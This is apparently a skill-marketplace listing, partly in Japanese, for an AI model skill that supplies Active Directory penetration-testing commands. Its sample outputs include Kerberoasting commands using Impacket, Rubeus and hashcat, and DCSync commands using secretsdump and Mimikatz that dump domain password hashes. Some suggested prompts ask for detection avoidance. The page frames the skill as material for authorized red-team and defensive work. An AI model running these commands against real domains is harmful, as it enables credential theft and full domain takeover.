active-directory-attacks
Execute Active Directory penetration testing and red team assessments
Security teams need comprehensive reference material for authorized Active Directory assessments. This skill provides documented attack techniques and tool commands for penetration testers conducting red team operations.
スキルZIPをダウンロード
Claudeでアップロード
設定 → 機能 → スキル → スキルをアップロードへ移動
オンにして利用開始
テストする
「active-directory-attacks」を使用しています。 Show me Kerberoasting commands for domain example.local
期待される結果:
- Using Impacket from Linux: GetUserSPNs.py example.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
- Using Rubeus from Windows: .\Rubeus.exe kerberoast /outfile:hashes.txt
- Cracking with hashcat: hashcat -m 13100 hashes.txt rockyou.txt
「active-directory-attacks」を使用しています。 How do I perform a DCSync attack?
期待される結果:
- DCSync requires Replicating Directory Changes rights. Using Impacket: secretsdump.py example.local/admin:password@10.10.10.10 -just-dc
- Using Mimikatz: lsadump::dcsync /domain:example.local /user:krbtgt
- This extracts all domain password hashes including krbtgt for Golden Ticket creation
セキュリティ監査
低リスクThis skill contains documentation and reference material for Active Directory penetration testing techniques. Static analysis flagged 200+ patterns (PowerShell commands, tool references, IP addresses) but all are FALSE POSITIVES - the files are markdown documentation, not executable code. Content describes legitimate security tools (BloodHound, Impacket, Mimikatz) used by penetration testers. Risk is LOW because: (1) files are read-only reference material, (2) no code execution occurs, (3) content is educational for authorized security testing. Recommend adding disclaimer about authorized use only.
高リスクの問題 (2)
中リスクの問題 (2)
低リスクの問題 (2)
リスク要因
🌐 ネットワークアクセス (4)
📁 ファイルシステムへのアクセス (2)
検出されたパターン
品質スコア
作れるもの
Red Team Assessment Planning
Security consultants preparing for authorized AD assessments use this skill to plan attack paths and select appropriate tools for engagement scope.
Blue Team Defense Research
Defensive security teams study attack techniques to understand adversary TTPs and improve detection rules for their SIEM and EDR platforms.
Security Training and Education
Instructors use documented techniques to teach students about AD vulnerabilities and proper remediation strategies in controlled lab environments.
これらのプロンプトを試す
I need to perform authorized Active Directory reconnaissance. What BloodHound commands should I use to enumerate domain users, groups, and computers? Target domain is example.local with credentials user:password.
Show me how to perform Kerberoasting against an Active Directory domain. Include commands for extracting TGS tickets with Impacket and cracking them with hashcat.
I have compromised a low-privilege domain user. What are the recommended lateral movement techniques to escalate privileges? Compare pass-the-hash, overpass-the-hash, and delegation attacks.
Explain how to achieve domain dominance using DCSync and Golden Ticket attacks. Include the prerequisites, commands, and detection avoidance considerations for each technique.
ベストプラクティス
- Always obtain written authorization before executing any AD attack techniques against production environments
- Document all compromised accounts and accessed systems for client reporting and remediation guidance
- Synchronize time with domain controller before Kerberos attacks to avoid clock skew failures
- Use stealth techniques like user enumeration limits to avoid account lockouts during password spraying
- Restore any modified system state (like ZeroLogon password changes) after testing completion
回避
- Never execute attack commands against environments without explicit written authorization from the owner
- Do not run aggressive password spraying that could lock out legitimate user accounts
- Avoid leaving Golden Tickets or other persistence mechanisms without documenting them for removal
- Do not modify production Active Directory objects, GPOs, or configurations without approval
よくある質問
Is this skill legal to use?
What tools do I need to execute these attacks?
Can this skill automatically run attacks?
What is the difference between Kerberoasting and AS-REP Roasting?
How do I detect these attacks in my environment?
What is a Golden Ticket and why is it dangerous?
開発者の詳細
作成者
sickn33ライセンス
MIT
リポジトリ
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/active-directory-attacks参照
main
ファイル構成